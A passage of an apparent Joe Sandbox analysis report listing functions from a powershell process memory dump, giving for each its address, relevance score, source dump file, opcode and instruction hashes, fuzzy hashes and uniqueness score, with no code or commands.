                                                                                              • Opcode Fuzzy Hash: 89d5671cc3767cc6636f48363c8f81bf277ad7c10051a683fa71c13687be68f6
                                                                                              • Instruction Fuzzy Hash: CC11C43930074157CB50EB79D4909BFB3E6AFC2354B84993CD51A8F244EFA5AD0547C0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037DFC48, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: dlTh
                                                                                              • API String ID: 0-1232337974
                                                                                              • Opcode ID: a90a7a44829f9b09dcf5d8a395879f99a0b5e64e79683a507019255596de18f3
                                                                                              • Instruction ID: 36e38fdcd68625cfd7be23490a0c9fb69ecb3c62b52493fb5439c8ea1e9d452b
                                                                                              • Opcode Fuzzy Hash: a90a7a44829f9b09dcf5d8a395879f99a0b5e64e79683a507019255596de18f3
                                                                                              • Instruction Fuzzy Hash: 9441D27A6007149FCB24DF78D880AAEB7B1FF85315F018A6AD512DF250DB76A9048BD2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D44E7, Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%Ph
                                                                                              • API String ID: 0-3376469824
                                                                                              • Opcode ID: 493918b37d80d06805e4bdf807f1c916e1c2b1f44593f0ab34157708ed0a3871
                                                                                              • Instruction ID: 002992c7bee4a6ce6d073b7559fe8ad3328d047c48cd597c27c3e45eac7f5157
                                                                                              • Opcode Fuzzy Hash: 493918b37d80d06805e4bdf807f1c916e1c2b1f44593f0ab34157708ed0a3871
                                                                                              • Instruction Fuzzy Hash: F731BC38A006448FDB05DB78C4547AEBBF2AF88304F188879D546AB380DF749D46CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D44F8, Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%Ph
                                                                                              • API String ID: 0-3376469824
                                                                                              • Opcode ID: 8f0d3ee5664ef9e965288ccf8830bad65132a3d71e219b9a147ae4b609e9ea47
                                                                                              • Instruction ID: 186d491a1f3ef273fcb28f45813a8c5a0727c044cb61e271857fad5baaa2b291
                                                                                              • Opcode Fuzzy Hash: 8f0d3ee5664ef9e965288ccf8830bad65132a3d71e219b9a147ae4b609e9ea47
                                                                                              • Instruction Fuzzy Hash: 5E31CE38A006148FDB14DB78C454BAFBAF3AF88304F188879D146AB384DF749D05CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D4330, Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8^Th
                                                                                              • API String ID: 0-4014439890
                                                                                              • Opcode ID: 6a16dc9ec45edc13ade771a7ec4c4779040aa3586ba0242f323a65d1ad01c439
                                                                                              • Instruction ID: 811941edcc41b54804c82afaee5e2a5f39bb38870e8038f8471cf11572c2b29e
                                                                                              • Opcode Fuzzy Hash: 6a16dc9ec45edc13ade771a7ec4c4779040aa3586ba0242f323a65d1ad01c439
                                                                                              • Instruction Fuzzy Hash: 09F0A4373042205FD724DAADE88096AB3E9EBC8725B55017AE509CB280DF72DC0287D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D457F, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%Ph
                                                                                              • API String ID: 0-3376469824
                                                                                              • Opcode ID: 6fccd0360d892bc6b383fee8951c3ffe53c517f54fcb938253a515bd1ecf5dea
                                                                                              • Instruction ID: f1182e707e5857ba0c08fe5c68792959057f01dac7f08a99da94740e9cd7b0b2
                                                                                              • Opcode Fuzzy Hash: 6fccd0360d892bc6b383fee8951c3ffe53c517f54fcb938253a515bd1ecf5dea
                                                                                              • Instruction Fuzzy Hash: 90117978A006058FDB24DB78C1587AB7AF2AF88204F588868D042AF384EFB5D904CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D459A, Relevance: 1.3, Strings: 1, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $%Ph
                                                                                              • API String ID: 0-3376469824
                                                                                              • Opcode ID: 53d5f54b3ed5f550042bb83437063499db55d58b62bd470b2ac993aba6f91b5c
                                                                                              • Instruction ID: e85d2be106091acf2a53ef90d92416cf74f6c9d74193236598f40ea91c455b56
                                                                                              • Opcode Fuzzy Hash: 53d5f54b3ed5f550042bb83437063499db55d58b62bd470b2ac993aba6f91b5c
                                                                                              • Instruction Fuzzy Hash: 3D113978A006158FDB24DB78C0586AB7AF2AF88205F588968D046AF384EF75D905CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D4321, Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8^Th
                                                                                              • API String ID: 0-4014439890
                                                                                              • Opcode ID: 2ad23f4ed97624bdcba6ad470f9686c83afd0a036046a9818e29d023e95b31e3
                                                                                              • Instruction ID: 9410ce756c27922f5d67c5081294f8ea01d1e9fbf4f614e7cd7eedf08bdcbbb2
                                                                                              • Opcode Fuzzy Hash: 2ad23f4ed97624bdcba6ad470f9686c83afd0a036046a9818e29d023e95b31e3
                                                                                              • Instruction Fuzzy Hash: 06F0AF367042109FD724DEACE884A6AB7EAEF88715B15016AE509CB390DF71EC42C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2DA1, Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $,Th
                                                                                              • API String ID: 0-2734500299
                                                                                              • Opcode ID: 99933aa88ca20cb40ec4515cab6b6f8ed657f493e6175903fa9c36e41d7b025c
                                                                                              • Instruction ID: 73172fe57208b3daf023fb4e0c28d3f0692cbb4153ae471ad5838e0eb637a4f8
                                                                                              • Opcode Fuzzy Hash: 99933aa88ca20cb40ec4515cab6b6f8ed657f493e6175903fa9c36e41d7b025c
                                                                                              • Instruction Fuzzy Hash: 3DF0BE3A6009108FC754E778D498BEE73EADF88312F404C6ED20E8B261CE24A88687D1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2DB0, Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $,Th
                                                                                              • API String ID: 0-2734500299
                                                                                              • Opcode ID: e62655aab334b711a0877e5991fb18f828abcd7eb2c6a5a12fd23ec50c09e206
                                                                                              • Instruction ID: e31b93bb04af958d5e83152cc6e5e9ae1fd50c0aa4e6d5ed221030ef9c09acca
                                                                                              • Opcode Fuzzy Hash: e62655aab334b711a0877e5991fb18f828abcd7eb2c6a5a12fd23ec50c09e206
                                                                                              • Instruction Fuzzy Hash: BFF01C3A6105145FC664E768D898BAE73EADBC9315F40486DE20A8B261DE60AC4687E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2801, Relevance: .3, Instructions: 317COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3df3d44904ef3ddb24e6c0ad7bc68ab9e34212879e6d0b62177e5da484683e7a
                                                                                              • Instruction ID: 2224d792c7da67b21a2bd633574c2b46a9ec649be46f1a82b4ee2bce684ec58e
                                                                                              • Opcode Fuzzy Hash: 3df3d44904ef3ddb24e6c0ad7bc68ab9e34212879e6d0b62177e5da484683e7a
                                                                                              • Instruction Fuzzy Hash: AEE13B38610604CFD709EBA0D894AAF7377EF89305F1094B9C2052F399DBB5AD46CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D2810, Relevance: .3, Instructions: 316COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f44c3cf2443fedaee9141ca3185bceb8e5f7ee2b223763df21055fe4b5803129
                                                                                              • Instruction ID: a1b686991e99602bd7636b7a91232d6acb7096121be761d138471ec7f0328a11
                                                                                              • Opcode Fuzzy Hash: f44c3cf2443fedaee9141ca3185bceb8e5f7ee2b223763df21055fe4b5803129
                                                                                              • Instruction Fuzzy Hash: 79D13B38610604CFD709EBA0D894AAF7377EF89305F5094B9C2012F399DBB5AD46CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D35B9, Relevance: .3, Instructions: 263COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7d3ac1986f1e518b99fc05145f80a82b56ed68e73bcda9ea237e7e5a5c38a2de
                                                                                              • Instruction ID: 9c94570a64237a23bedb7831e16690019956c748a22db99606f91f95883287ae
                                                                                              • Opcode Fuzzy Hash: 7d3ac1986f1e518b99fc05145f80a82b56ed68e73bcda9ea237e7e5a5c38a2de
                                                                                              • Instruction Fuzzy Hash: 0CB1697CA106049FD784EBA4D958BAFB7B2EF89301F118078D6056F395CE39AC468F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D5480, Relevance: .3, Instructions: 261COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d8ad5b0c66ee3688bc1632cb4d820303b6851f90ef7d4ab42869b1430abb376d
                                                                                              • Instruction ID: 5a1c02f25f2d50082271bd93ceb2c91c1c0c81aaa6821f47215f84f44e0e9d77
                                                                                              • Opcode Fuzzy Hash: d8ad5b0c66ee3688bc1632cb4d820303b6851f90ef7d4ab42869b1430abb376d
                                                                                              • Instruction Fuzzy Hash: 35B16B78A00218DFCB05DFA4C494AAEBBF2BF8A314F5484A9D405AF355DB75DD82CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D35C8, Relevance: .3, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86ed44cbc7760d85fae1965b3e9f3adc5efba7c5758c1390b4329bedc3e30e2d
                                                                                              • Instruction ID: cb936c1674d499df9c081f90b884e59b95ec1c4994bbcf5e0209bd3c9ebc4392
                                                                                              • Opcode Fuzzy Hash: 86ed44cbc7760d85fae1965b3e9f3adc5efba7c5758c1390b4329bedc3e30e2d
                                                                                              • Instruction Fuzzy Hash: 94B1697CA106049FD784EBA4D958BAFB7B2EF89301F118078D6056F395CE35AC458F61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D544F, Relevance: .3, Instructions: 251COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 10a9a6dbcf35710fe7d54a0743254d861c2120eed1a0206c4c18b65ca80f35e2
                                                                                              • Instruction ID: c2b14119ccca72df6bfa2e810262f1a113e4e6a2143fb795a65c68a74dbc2d80
                                                                                              • Opcode Fuzzy Hash: 10a9a6dbcf35710fe7d54a0743254d861c2120eed1a0206c4c18b65ca80f35e2
                                                                                              • Instruction Fuzzy Hash: 11B17D79A00348DFCB05DFA4C584AAEBBF2BF4A314F5884A9D441AF355CB759D81CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D6070, Relevance: .2, Instructions: 211COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ed53c9d4ff8b856ca23f7466f75b0ca625edb2daaf5ba04ecfb1f53b328f92c3
                                                                                              • Instruction ID: 48425c126abba74a7acbcc8be06fbf1cf146703f8dc1538c16f1dd0788066752
                                                                                              • Opcode Fuzzy Hash: ed53c9d4ff8b856ca23f7466f75b0ca625edb2daaf5ba04ecfb1f53b328f92c3
                                                                                              • Instruction Fuzzy Hash: B3818B383106008FCB44DF38D498A6E77F2EF88309B548969D546CB3A5DB75ED4ACB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037DAD78, Relevance: .2, Instructions: 157COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5e9204ad7ac59a9df5abff5a1b853209869facd99b954132f2eb5aa3910ead47
                                                                                              • Instruction ID: 4ef9cce3f816855cc5824757085c6eeedb91cf9e62dcf0eae97108c03fa042b1
                                                                                              • Opcode Fuzzy Hash: 5e9204ad7ac59a9df5abff5a1b853209869facd99b954132f2eb5aa3910ead47
                                                                                              • Instruction Fuzzy Hash: 6751AF74E102158BCB18DBA4D5506EEB7F2BF88304F54856AE801BB348DB749D46CBD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D0DD0, Relevance: .2, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 56c996e3ce49dd0e092444ee9923ce9d0826134e12ecbb46e66bc42b7890b9e8
                                                                                              • Instruction ID: f8dc372ba93e7646ae9da9f83dba892c4297f4b210faa0014a2eaf7b21cddc0b
                                                                                              • Opcode Fuzzy Hash: 56c996e3ce49dd0e092444ee9923ce9d0826134e12ecbb46e66bc42b7890b9e8
                                                                                              • Instruction Fuzzy Hash: EB51B434A10708CFDB04EFB4D8497AEBBB2EF88305F148569E505AB390EF749985CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D0DBF, Relevance: .2, Instructions: 154COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f67e22d8898ce2f600e72d8b8301e0377bec7924f11f0aa76fcd10ae8d0bdecb
                                                                                              • Instruction ID: 3a00e9d6aa5dd8c1b33d6b6121fdf24a9a4513e7f7efce8c29aecb2cd3521382
                                                                                              • Opcode Fuzzy Hash: f67e22d8898ce2f600e72d8b8301e0377bec7924f11f0aa76fcd10ae8d0bdecb
                                                                                              • Instruction Fuzzy Hash: A0519234A10709CFDB04EFB4D849BAEBBB2FF84305F148569E505AB294EF749885CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D5F30, Relevance: .1, Instructions: 109COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b1d160b20376f96d54d4ec595fa9095be633d849b5544f24e0bc8add06f15f5
                                                                                              • Instruction ID: 19e4072d7bdb012da83058828c366acc1b1d3a2ec247458a4cffe20571302554
                                                                                              • Opcode Fuzzy Hash: 9b1d160b20376f96d54d4ec595fa9095be633d849b5544f24e0bc8add06f15f5
                                                                                              • Instruction Fuzzy Hash: AD31D275A042549FCB10DFA9D494BEEFFF9EB89310F14816AE808EB341CB759941CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D61E8, Relevance: .1, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a51ce577e03b2cb922f43ec3ffd428e69bea90dd47453ad6436b2d4b9b88c89
                                                                                              • Instruction ID: d5c13e1932cea57aff2ce5641229fe8f267a9505c50d1b31bb97531317f485d3
                                                                                              • Opcode Fuzzy Hash: 9a51ce577e03b2cb922f43ec3ffd428e69bea90dd47453ad6436b2d4b9b88c89
                                                                                              • Instruction Fuzzy Hash: AC410638310A009FCB44DF39E49891A77E2FF89359B1485A8E50ACB3A5DB75EC56CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037DAE03, Relevance: .1, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: edb43a72e28ecefb37ed376de40a4a3ddd62007aca229f803c8fd5b2e2af55ed
                                                                                              • Instruction ID: fdce5fdd8f85b7111670606e1290b161f3c52f30a5c53b4846a64e202eae9d5f
                                                                                              • Opcode Fuzzy Hash: edb43a72e28ecefb37ed376de40a4a3ddd62007aca229f803c8fd5b2e2af55ed
                                                                                              • Instruction Fuzzy Hash: 91319F78B107168BCB18DF64D5506AE77B3AFC8308B94856AE801AF348DF7499468BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D4398, Relevance: .1, Instructions: 94COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 126107994b9937deeaf98d11bfc7e3cee1a9b7c90729c21daa40854787e1e5e6
                                                                                              • Instruction ID: 2fb12a6767de5992c8f63a09a7b2c0e3a8a796198ba9450f1aa01875ef5251e8
                                                                                              • Opcode Fuzzy Hash: 126107994b9937deeaf98d11bfc7e3cee1a9b7c90729c21daa40854787e1e5e6
                                                                                              • Instruction Fuzzy Hash: 7F3103397106118BEB08E735E96873F62A7AFC4209F58812DE5068B288DF758D86C7C1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D43A8, Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c560767ab41bec432714a732239800eb1e2dc50ceb571134b97d82322b98cbc2
                                                                                              • Instruction ID: c55109b5c05657e99de05299763f7c9b259b8a947ae76ec7789c825f439a44f2
                                                                                              • Opcode Fuzzy Hash: c560767ab41bec432714a732239800eb1e2dc50ceb571134b97d82322b98cbc2
                                                                                              • Instruction Fuzzy Hash: A231C1383106114BEB18E626E96877F72A7AFC4319F58813DE5068B2C8DF759D86C7C1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037DAE40, Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ecb06385320ce9a1e7e0fea8f546d570aa6b87f016febf06128064f8e452a629
                                                                                              • Instruction ID: 0029d8fad8fed208293a8e5ec269d348100996cbd43ed94ae349b3305f89f089
                                                                                              • Opcode Fuzzy Hash: ecb06385320ce9a1e7e0fea8f546d570aa6b87f016febf06128064f8e452a629
                                                                                              • Instruction Fuzzy Hash: CE319074A107168BCB14DF60D5806AEB7B6BF88704F94852AF801AF348DF74A9068BD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D1770, Relevance: .1, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1dfbf198b0f1ce760a788214ed8b830dfbf61dc1c88ff854c57a94a412c616a4
                                                                                              • Instruction ID: ebdf0002bfb95a48a6f59f2acbc7ad1ae42ae3fa5665af29c614cc27f9ddbc47
                                                                                              • Opcode Fuzzy Hash: 1dfbf198b0f1ce760a788214ed8b830dfbf61dc1c88ff854c57a94a412c616a4
                                                                                              • Instruction Fuzzy Hash: 6F31B038B047498BEB14EFB4C4087AFBEF2AF44314F588468C001AB284DFB9C941DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D1760, Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75ba7f2678cf9a0bb50132fe8089022984468cedf8220e28463737a4e8b768d8
                                                                                              • Instruction ID: bf09c590d5090f68cda1b26c02ea6c1ca4e413ab51cc1ee81adc00f5b663a7dc
                                                                                              • Opcode Fuzzy Hash: 75ba7f2678cf9a0bb50132fe8089022984468cedf8220e28463737a4e8b768d8
                                                                                              • Instruction Fuzzy Hash: D3310278B042448BEB14DFB4C4047EEBFF2AF44324F584469C401AB284DFB98841DBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D47E0, Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6d6a0b0ffd56ac18a096298bf3f3e86087650d98ce3ed2427e9bbee528e12033
                                                                                              • Instruction ID: a6a29601bd86def8f2cd79dc0caee74a7054e1d92295afdf6baa19a69faf4924
                                                                                              • Opcode Fuzzy Hash: 6d6a0b0ffd56ac18a096298bf3f3e86087650d98ce3ed2427e9bbee528e12033
                                                                                              • Instruction Fuzzy Hash: F5219034A102848FDB50DB66C855BEEB7F2FF84346F4444A8C505BB290DF755A44DBA1
                                                                                              Uniqueness

